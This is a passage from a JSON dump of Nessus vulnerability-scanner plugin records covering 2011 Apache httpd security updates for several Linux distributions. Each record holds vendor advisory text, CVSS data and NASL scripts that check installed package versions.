script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-devel-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-devel / apache2-example-certificates / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:29", "description": "Updated httpd packages that fix two security issues and one bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "RHEL 6 : httpd (RHSA-2011:1391)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1"], "id": "REDHAT-RHSA-2011-1391.NASL", "href": "https://www.tenable.com/plugins/nessus/56578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1391. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56578);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(49616, 49957);\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2011:1391)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix two security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1391\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-16T17:01:22", "description": "This update brings Apache to version 2.2.12.\n\nThe main reason is the enablement of the Server Name Indication (SNI) that allows several SSL-enabled domains on one IP address (FATE#311973). See the SSLStrictSNIVHostCheck directive as documented in /usr/share/apache2/manual/mod/mod_ssl.html.en\n\nAlso the patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added.\n\nIntroduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. This option is a backport from 2.2.21.\n\nAlso fixed were\n\n - Denial of service in proxy_ajp when using a undefined method. (CVE-2011-3348)\n\n - Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules. This update also includes a newer apache2-vhost-ssl.template, which disables SSLv2, and allows SSLv3 and strong ciphers only. Please note that existing vhosts will not be converted. (CVE-2011-3368)", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/57089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57089);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5344)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Apache to version 2.2.12.\n\nThe main reason is the enablement of the Server Name Indication (SNI)\nthat allows several SSL-enabled domains on one IP address\n(FATE#311973). See the SSLStrictSNIVHostCheck directive as documented\nin /usr/share/apache2/manual/mod/mod_ssl.html.en\n\nAlso the patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added.\n\nIntroduce new config option: Allow MaxRanges Number of ranges\nrequested, if exceeded, the complete content is served. default: 200\n0|unlimited: unlimited none: Range headers are ignored. This option is\na backport from 2.2.21.\n\nAlso fixed were\n\n - Denial of service in proxy_ajp when using a undefined\n method. (CVE-2011-3348)\n\n - Exposure of internal servers via reverse proxy methods\n with mod_proxy enabled and incorrect Rewrite or Proxy\n Rules. This update also includes a newer\n apache2-vhost-ssl.template, which disables SSLv2, and\n allows SSLv3 and strong ciphers only. Please note that\n existing vhosts will not be converted. (CVE-2011-3368)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3192.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5344.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-doc-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-example-pages-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-prefork-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-utils-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-worker-2.2.12-1.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:36:05", "description": "Multiple vulnerabilities has been found and corrected in apache :\n\nInteger overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow (CVE-2011-3607).\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an \\@ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368 (CVE-2011-4317).\n\nThe updated packages have been patched to correct these issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-01-11T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2012:003)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_userdir", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-source", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-003.NASL", "href": "https://www.tenable.com/plugins/nessus/57480", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:003. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57480);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\");\n script_bugtraq_id(50494, 50802);\n script_xref(name:\"MDVSA\", value:\"2012:003\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2012:003)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in apache :\n\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow (CVE-2011-3607).\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an \\@ (at sign)\ncharacter and a : (colon) character in invalid positions. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368\n(CVE-2011-4317).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", 